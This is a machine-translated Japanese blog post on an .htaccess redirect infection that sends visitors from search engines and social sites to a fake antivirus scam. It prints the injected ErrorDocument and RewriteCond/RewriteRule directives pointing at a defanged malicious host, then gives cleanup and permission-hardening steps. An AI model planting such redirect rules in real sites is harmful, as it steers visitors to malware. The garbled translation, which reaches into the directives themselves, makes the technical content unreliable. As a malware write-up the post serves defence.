マルウェア/ウイルス - .htaccessの「リライト」&リダイレクト

ウイルスの新しい形 私は、ずっと上のホストされているサイトには影響を与え知りませ参照します 安全でないサーバ ここで、ユーザアカウント/サブアカウントがお互いを「見る」ことができます。 具体的には、すべてのホスティングアカウントは "フォルダに置かれバーチャルホスト"そして、書き込みの権利 ユーザーフォルダ 「バーチャルホスト」は、ほとんどの状況で一般的...販売代理店をユーザに与えられています。 これは、Webサーバーを使用しない典型的な方法であり、 WHM / cPanelの.

アクションの.htaccessウイルス - .htaccessのハック

ウイルス ファイルに影響 .htaccess 被害者のサイト。 行が追加されます/ 指令訪問者をリダイレクトします 提供するいくつかのウェブサイトに(ヤフー、MSN、グーグル、フェイスブック、yaindex、さえずり、MySpaceは、高トラフィックなどのサイトやポータルから来る) "アンチウイルス"。それはです 偽のアンチウイルスソリューション、私はに冒頭で書いた .

これはどのようにある .htaccess 影響を受けた:(次の行では、コンテンツのURLにアクセスできない)

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

RewriteEngineをオンにする

のRewriteCond%{HTTP_REFERER}。* Yandexの。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。* Odnoklassniki。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。* Vkontakte。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*ランブラー。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*チューブ。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*ウィキペディア。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*ブロガー。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*百度。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。* Qq.com。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。* Myspaceの。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。* Twitterの。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。* Facebookの。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*グーグル。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*ライブ。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。* AOLの。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*ビンビン。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。* MSN。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*アマゾン。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*イーベイ。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。* LinkedInの。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。* Flickrの。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*はLiveJasmin。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*曹操。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*ダブルクリック。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。* Pornhub。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。* Orkutの。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。* LiveJournalの。* $ [NC、OR]
のRewriteCond%{HTTP_REFERER}。* Wordpressの。* $ [NC、OR]
のRewriteCond%{HTTP_REFERER}。*ヤフー。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*確認して下さい。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*エキサイト。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*アルタビスタ。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。* MSN。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*ネットスケープ。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*ホットボット。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*後藤。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*インフォシーク。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*マンマ。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。* Alltheweb。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*ライコス。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*検索。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。* MetaCrawler。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。*メール。* $ [NC、OR]
するRewriteCond%{HTTP_REFERER}。* Dogpileの。* $ [NC]

のRewriteCond%{HTTP_USER_AGENT}。* Windows *版。
。のRewriteRule * Hxxp://wwww.peoriavascularsurgery.com/main.php H =%{}&アイ= HTTP_HOST J8iiidsar / qmiRj7V8NOyJoXpA ==&E = R [R、L]?

REQUEST_FILENAMEするRewriteCond%{}!-f
REQUEST_FILENAMEするRewriteCond%{}!-d
REQUEST_FILENAMEするRewriteCond%{}!*またはJPG $ |。*のGIF $ |。* PNG形式の$
のRewriteCond%{HTTP_USER_AGENT}。* Windows *版。
するRewriteRule * Hxxp:?//wwww.peoriavascularsurgery.com/main.php H =%{}&アイ= HTTP_HOST J8iiidsar / qmiRj7V8NOyJoXpA ==&E = 4 [R、L]

ワードプレスを使う人は、ファイルに次の行を見つける .htaccess から public_htmlの。 また、ウイルスは、フォルダ、同一の.htaccessファイルを作成します。 WP-コンテンツ.

*代わりに表示される状況もありますpeoriavascularsurgery.com dns.thesoulfoodcafe.com または他のアドレス。

何がこのウイルスになります。

リダイレクトされると、訪問者は、メッセージによって両手を広げて迎えされています。

警告!
お使いのコンピュータがウイルスやマルウェアのプログラムの存在の様々な症状が含まれています。 あなたの即時のは、アンチウイルスシステムのチェックが必要です!
セキュリティシステムは、ウイルスや悪意のあるプログラムのためにPCを迅速かつ自由なスキャンを実行します。

1のマルウェア

どんなにあなたが押すどのボタン、あなたが「ページが表示されていません[マイコンピュータ]「模倣するように設計 XPのデザイン。 これは、自動的に私たちは「感染」していることを発見するの末尾に「スキャン」を開始します。

2のマルウェア

[OK]をクリックするか、キャンセルした後、開始されます ダウンロードアキファイル setup.exeを。 この setup.exeが偽のアンチウイルスです システムに影響を与える。 あなたはさらにリンクがウイルスを伝播するためにいくつかのマルウェアをインストールし、これら以外に アンチウィルスソフトウェア 被害者がそれを購入するために招待されていること(すべて偽)。
すでにウイルスに接触した者は、このフォームを使用することができます 。 また、HDD全体をスキャンすることをお勧めします。 推薦する カスペルスキーインターネットセキュリティ または カスペルスキーアンチウイルス.

このタイプのウイルスは、旅行者のOSオペレーティング·システムに影響 Windows XPでは、Windows Meでは、Windows 2000は、Windows NT、Windowsの98 およびWindows 95。 これまでのところ、オペレーティングシステム、Windows VistaおよびWindows 7の感染は知ら事例はありません。

どのように我々はサーバ上でこのウイルスhtaccessファイルを削除することができ、かつ感染を防ぐ方法。

1. 疑わしいファイル、消去コードを分析します。 ファイルのみに影響されないことを確認するには .htaccess 良いです すべてのファイルを分析する 。PHPの si 。Jsの.

2。 ファイルを書き換えhtaccessファイルと私はセット chmodの644 または 744 書き込みアクセスを持つ唯一の ユーザ所有者.

3。 あなたは、フォルダ内のウェブサイトのホスティングアカウントを作成するとき /ホーム または ウェブルート/ これは、自動的に多くの場合、ユーザーの名前を持つフォルダが作成されます(cPanelの、FTPのユーザー、等)。 一人のユーザーから別のデータを書き込むと、送信ウイルスを防ぐためには、各ユーザーのフォルダを設定することをお勧めします。

chmodコマンドまたは644 744、755 - 示さは644です。
chownは-R nume_userのnume_folder。
chgrpコマンド-R nume_user nume_folder

LS-すべて それらが正しく行われたかどうかを確認する方法。 このようなものが表示されるはずです:

です。drwx-X-X 12 Dinamics Dinamics月4096 6 14:51 Dinamics /
です。drwx-X-X 10デュランデュラン月4096 7 07:46デュラン/
です。drwx-X-X 12 4096月29 11チューブ管:23チューブ/
をdrwxr-xr - xに14 4096 2月26 2009エクスプレスエクスプレス/
をdrwxr-xr - xに9 EZO EZO月4096 19 01:09 EZO /
です。drwx-X-X製薬製薬9 4096 12月19 22:29製薬/

上記の一つはuserele FTPになる場合 感染ファイルこれは、別のユーザーのホストにウイルスを送信することはできません。 これは、Webサーバー上でホストのアカウントを保護するための最低限のセーフティネットである。

このタイプのウイルスによって被害を受けた地域の共通の要素。

影響を受けたすべての領域は、 "/を含むドメイン名でサイトへの訪問者をリダイレクト"。

この "ウイルス。htaccessファイル"CMSのいずれかのタイプに影響(phpBBのJoomlaの、ワードプレス、など)を使用してその .htaccess

htaccessファイルは、ウイルスハック&リダイレクト.

マルウェア/ウイルス - .htaccessの「リライト」&リダイレクト

著者について

ステルスLP

創設者兼編集者 ステルス設定2006日で。
Linuxオペレーティングシステム(特にCentOSの)やMac OS X、Windows XPの>は、Windows 10とワードプレス(CMS)上の経験。

コメントを残す

このサイトはAkismetを使用して迷惑メールを減らします。 コメントの処理方法を学ぶ.